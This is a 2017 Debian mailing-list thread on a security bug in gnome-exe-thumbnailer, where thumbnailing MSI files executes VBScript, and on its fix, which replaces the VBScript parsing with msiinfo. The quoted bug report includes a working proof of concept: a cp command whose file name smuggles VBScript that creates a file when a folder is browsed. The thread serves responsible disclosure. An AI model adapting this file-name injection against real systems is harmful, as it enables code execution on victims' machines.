[pkg-wine-party] Bug#868705: Bug#868705: gnome-exe-thumbnailer: Thumbnail generation for MSI files executes arbitrary VBScript
bitflip3 at gmail.com
Tue Jul 18 01:12:04 UTC 2017
Control: tag 868705 + pending fixed-upstream
msiinfo is part of msitools, just like wixl:
https://github.com/GNOME/msitools. I haven't audited the code, but being
under the GNOME umbrella and having a history of 5 years probably means
that it's reliable enough.
(I've also heard reports so far that msiinfo is a lot /faster/ than
running code through Wine's cscript, which is not really much of a
On 18/07/17 09:02 AM, Nils Dagsson Moskopp wrote:
> I like that the patch is less code. Deleted code is debugged code!
> Btw, are you sure that using mssiinfo does not introduce new bugs?
> James Lu <bitflip3 at gmail.com> writes:
>> [ Unknown signature status ]
>> Hi Nils,
>> I wasn't able to reproduce the exploit on my (64-bit) system with either
>> Caja and Nautilus (it also required setting up a new wineprefix in
>> ~/.wine). The msi thumbnail ended up generating without any version
>> information tag at all.
>> Regardless, I've gone and replaced the VBScript-based parsing entirely
>> with msitools' msiinfo in
>> hopefully this should fix the issue. I'll tag a new release soon and
>> look at pushing the fix to Debian.
>> (Also CC'ing the other maintainers, who I don't think are on the Debian
>> Wine list)
>> On 18/07/17 05:01 AM, Nils Dagsson Moskopp wrote:
>>> Package: gnome-exe-thumbnailer
>>> Version: 0.9.4-2
>>> Severity: grave
>>> Tags: security
>>> Justification: user security hole
>>> Dear Maintainer,
>>> the following PoC is copied verbatim from my post about the parsing issue:
>>> Proof of Concept
>>> Install Dependencies
>>> On Debian GNU/Linux, install the packages gnome-exe-thumbnailer, nautilus and wixl. The wixl package is only needed to create MSI files that trigger the thumbnailer.
>>> If the proof of concept does not work, install winetricks and run winetricks wsh56 to upgrade the Windows Script Host.
>>> Create MSI Files
>>> Create a file named poc.xml with the following content:
>>> <?xml version="1.0" encoding="utf-8"?>
>>> <Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
>>> <Product Version="1.0"/>
>>> Execute the following Bourne Shell code:
>>> wixl -o poc.msi poc.xml
>>> cp poc.msi "poc.msi\",0):Set fso=CreateObject(\"Scripting.FileSystemObject\"):Set poc=fso.CreateTextFile(\"badtaste.txt\")'.msi"
>>> Trigger Execution
>>> Start GNOME Files and navigate to the folder with the MSI files. An empty file with the name badtaste.txt should appear.
>>> *** End of the template - remove these template lines ***
>>> -- System Information:
>>> Debian Release: 9.0
>>> APT prefers stable
>>> APT policy: (500, 'stable')
>>> Architecture: i386 (i686)
>>> Kernel: Linux 3.16.0-4-686-pae (SMP w/1 CPU core)
>>> Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
>>> Shell: /bin/sh linked to /bin/dash
>>> Init: sysvinit (via /sbin/init)
>>> Versions of packages gnome-exe-thumbnailer depends on:
>>> ii icoutils 0.31.2-1.1
>>> ii imagemagick 8:126.96.36.199+dfsg-11
>>> ii imagemagick-6.q16 [imagemagick] 8:188.8.131.52+dfsg-11
>>> ii libglib2.0-bin 2.50.3-2
>>> Versions of packages gnome-exe-thumbnailer recommends:
>>> pn wine <none>
>>> pn wine64-tools | wine32-tools | wine64-development-tools | wine32-dev <none>
>>> gnome-exe-thumbnailer suggests no packages.
>>> -- no debconf information
>>> pkg-wine-party mailing list
>>> pkg-wine-party at lists.alioth.debian.org
-------------- next part --------------
A non-text attachment was scrubbed...
Size: 833 bytes
Desc: OpenPGP digital signature
More information about the pkg-wine-party